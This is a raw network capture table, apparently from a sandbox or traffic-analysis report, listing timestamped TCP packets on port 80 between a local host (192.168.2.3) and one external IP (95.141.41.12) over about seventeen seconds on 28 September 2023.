                                                                                              Sep 28, 2023 06:02:21.795036077 CEST4988480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.989736080 CEST804988395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:21.989990950 CEST4988380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.992223978 CEST804988495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:21.992486954 CEST4988480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:21.992826939 CEST4988480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:22.189860106 CEST804988495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:22.192054033 CEST804988495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:22.192226887 CEST4988480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:22.294271946 CEST4988480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:22.295032024 CEST4988580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:22.492659092 CEST804988495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:22.492928982 CEST4988480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:22.497401953 CEST804988595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:22.497647047 CEST4988580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:22.503678083 CEST4988580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:22.705462933 CEST804988595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:22.710561991 CEST804988595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:22.710796118 CEST4988580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:22.825320959 CEST4988580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:22.825777054 CEST4988780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:23.023349047 CEST804988795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:23.023497105 CEST4988780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:23.026340008 CEST804988595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:23.026549101 CEST4988580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:23.296442986 CEST4988780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:23.494568110 CEST804988795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:23.503654957 CEST804988795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:23.503742933 CEST4988780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:23.637226105 CEST4988780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:23.835333109 CEST804988795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:23.835489035 CEST4988780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:23.926661968 CEST4988980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.111304045 CEST804988995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:24.111452103 CEST4988980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.111805916 CEST4988980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.296559095 CEST804988995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:24.302020073 CEST804988995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:24.302107096 CEST4988980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.404228926 CEST4988980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.404756069 CEST4989080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.589653015 CEST804988995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:24.589966059 CEST4988980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.592513084 CEST804989095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:24.592739105 CEST4989080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.592952967 CEST4989080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.780563116 CEST804989095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:24.787611961 CEST804989095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:24.787800074 CEST4989080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.906172991 CEST4989080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:24.906757116 CEST4989180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.094660997 CEST804989095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:25.094861984 CEST4989080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.104929924 CEST804989195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:25.105194092 CEST4989180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.105473042 CEST4989180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.303786993 CEST804989195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:25.308391094 CEST804989195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:25.308757067 CEST4989180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.419522047 CEST4989180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.420134068 CEST4989380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.617825031 CEST804989195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:25.618057013 CEST4989180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.621679068 CEST804989395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:25.621807098 CEST4989380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.622144938 CEST4989380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.823173046 CEST804989395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:25.824538946 CEST804989395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:25.824661970 CEST4989380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.934899092 CEST4989380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:25.935930967 CEST4989480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.123016119 CEST804989495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:26.123102903 CEST4989480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.123353958 CEST4989480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.136260986 CEST804989395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:26.136351109 CEST4989380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.310403109 CEST804989495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:26.314821959 CEST804989495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:26.314959049 CEST4989480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.419162989 CEST4989480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.419661045 CEST4989680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.606916904 CEST804989495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:26.607027054 CEST4989480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.620599031 CEST804989695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:26.620712996 CEST4989680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.620939970 CEST4989680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.821643114 CEST804989695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:26.824481010 CEST804989695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:26.824688911 CEST4989680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.935023069 CEST4989680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:26.935245037 CEST4989780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.133327007 CEST804989795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:27.133577108 CEST4989780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.133913994 CEST4989780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.136337996 CEST804989695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:27.136425018 CEST4989680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.331260920 CEST804989795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:27.337898016 CEST804989795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:27.338324070 CEST4989780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.450503111 CEST4989780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.450767040 CEST4989980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.641824961 CEST804989995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:27.642126083 CEST4989980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.643011093 CEST4989980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.647969007 CEST804989795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:27.648118019 CEST4989780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.833914995 CEST804989995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:27.838766098 CEST804989995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:27.838963985 CEST4989980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.950359106 CEST4989980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:27.950881958 CEST4990080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.141256094 CEST804990095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:28.141791105 CEST4990080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.141844988 CEST804989995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:28.142131090 CEST4990080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.142469883 CEST4989980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.332644939 CEST804990095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:28.339128971 CEST804990095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:28.339720964 CEST4990080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.458334923 CEST4990080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.458784103 CEST4990180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.643939972 CEST804990195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:28.644224882 CEST4990180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.644354105 CEST4990180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.648694992 CEST804990095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:28.648792028 CEST4990080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.829003096 CEST804990195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:28.836998940 CEST804990195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:28.837091923 CEST4990180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.950747967 CEST4990180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:28.951153040 CEST4990380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.136689901 CEST804990195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:29.136809111 CEST4990180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.156651020 CEST804990395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:29.156770945 CEST4990380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.157002926 CEST4990380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.362833023 CEST804990395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:29.367386103 CEST804990395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:29.367595911 CEST4990380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.481570959 CEST4990380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.481836081 CEST4990480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.675235033 CEST804990495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:29.675376892 CEST4990480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.675760984 CEST4990480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.686978102 CEST804990395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:29.687238932 CEST4990380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.868966103 CEST804990495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:29.873614073 CEST804990495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:29.873719931 CEST4990480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.982640982 CEST4990480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:29.983130932 CEST4990680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.176523924 CEST804990495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:30.176668882 CEST4990480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.177114964 CEST804990695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:30.177326918 CEST4990680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.177481890 CEST4990680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.371742010 CEST804990695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:30.376130104 CEST804990695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:30.376451969 CEST4990680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.481761932 CEST4990680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.482474089 CEST4990780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.677606106 CEST804990695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:30.678308010 CEST4990680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.679938078 CEST804990795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:30.680399895 CEST4990780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.680399895 CEST4990780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.877583027 CEST804990795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:30.879748106 CEST804990795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:30.879966021 CEST4990780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.981513023 CEST4990780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:30.982278109 CEST4990880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:31.179490089 CEST804990895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:31.179569960 CEST804990795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:31.179780006 CEST4990880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:31.179891109 CEST4990780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:31.184447050 CEST4990880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:31.381556034 CEST804990895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:31.392395973 CEST804990895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:31.392487049 CEST4990880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:31.496999025 CEST4990880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:31.497534990 CEST4991080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:31.694876909 CEST804990895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:31.695203066 CEST4990880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:31.697774887 CEST804991095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:31.698225975 CEST4991080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:31.698225975 CEST4991080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:31.899023056 CEST804991095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:31.915225983 CEST804991095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:31.915419102 CEST4991080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.028476954 CEST4991080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.028840065 CEST4991180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.224623919 CEST804991195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:32.224849939 CEST4991180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.227150917 CEST4991180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.229316950 CEST804991095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:32.229499102 CEST4991080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.422199965 CEST804991195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:32.427289963 CEST804991195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:32.427366018 CEST4991180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.528435946 CEST4991180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.528825998 CEST4991380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.723499060 CEST804991195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:32.724143028 CEST4991180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.727296114 CEST804991395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:32.727719069 CEST4991380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.727819920 CEST4991380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:32.926100016 CEST804991395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:32.931824923 CEST804991395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:32.932315111 CEST4991380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.043989897 CEST4991380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.044466019 CEST4991480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.242655993 CEST804991395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:33.242727995 CEST4991380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.244204044 CEST804991495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:33.244326115 CEST4991480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.244527102 CEST4991480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.445620060 CEST804991495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:33.450167894 CEST804991495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:33.450469971 CEST4991480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.559595108 CEST4991480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.559916019 CEST4991580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.751173019 CEST804991595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:33.751385927 CEST4991580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.751569033 CEST4991580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.759409904 CEST804991495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:33.759601116 CEST4991480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:33.942796946 CEST804991595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:33.947582006 CEST804991595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:33.947693110 CEST4991580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.060100079 CEST4991580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.060496092 CEST4991780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.253186941 CEST804991595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:34.253750086 CEST4991580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.257925034 CEST804991795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:34.258306026 CEST4991780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.258398056 CEST4991780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.457794905 CEST804991795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:34.464062929 CEST804991795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:34.464545965 CEST4991780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.576895952 CEST4991780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.577292919 CEST4991880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.766902924 CEST804991895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:34.767479897 CEST4991880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.767822981 CEST4991880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.774069071 CEST804991795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:34.774276972 CEST4991780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:34.955027103 CEST804991895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:34.960220098 CEST804991895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:34.960378885 CEST4991880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.075342894 CEST4991880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.075674057 CEST4991980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.262882948 CEST804991895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:35.263118029 CEST4991880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.269294977 CEST804991995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:35.269516945 CEST4991980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.269663095 CEST4991980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.463553905 CEST804991995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:35.468000889 CEST804991995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:35.468185902 CEST4991980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.575181961 CEST4991980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.575468063 CEST4992180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.769181013 CEST804991995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:35.769547939 CEST4991980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.772033930 CEST804992195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:35.772346973 CEST4992180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.772552967 CEST4992180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:35.968971014 CEST804992195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:35.973994970 CEST804992195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:35.974205971 CEST4992180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.075185061 CEST4992180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.075719118 CEST4992280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.267755985 CEST804992295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:36.267961025 CEST4992280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.268177032 CEST4992280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.271873951 CEST804992195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:36.271950006 CEST4992180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.459820032 CEST804992295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:36.464445114 CEST804992295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:36.464835882 CEST4992280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.575474977 CEST4992280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.576911926 CEST4992380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.767385006 CEST804992295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:36.767651081 CEST4992280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.770098925 CEST804992395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:36.770344019 CEST4992380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.770698071 CEST4992380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:36.964133024 CEST804992395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:36.968513966 CEST804992395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:36.968956947 CEST4992380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.076040983 CEST4992380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.076508045 CEST4992580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.263736010 CEST804992595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:37.264034986 CEST4992580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.264178991 CEST4992580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.269833088 CEST804992395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:37.270028114 CEST4992380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.451339006 CEST804992595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:37.453087091 CEST804992595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:37.453218937 CEST4992580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.559778929 CEST4992580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.560059071 CEST4992680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.748203039 CEST804992595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:37.748414040 CEST4992580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.751195908 CEST804992695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:37.751396894 CEST4992680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.751478910 CEST4992680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:37.943224907 CEST804992695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:37.947830915 CEST804992695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:37.948075056 CEST4992680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.059689999 CEST4992680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.060168982 CEST4992880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.251574993 CEST804992695.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:38.251833916 CEST4992680192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.257541895 CEST804992895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:38.257720947 CEST4992880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.258019924 CEST4992880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.455292940 CEST804992895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:38.461225986 CEST804992895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:38.461669922 CEST4992880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.575225115 CEST4992880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.575522900 CEST4992980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.769256115 CEST804992995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:38.769658089 CEST4992980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.769887924 CEST4992980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:02:38.772334099 CEST804992895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:02:38.772404909 CEST4992880192.168.2.395.141.41.12
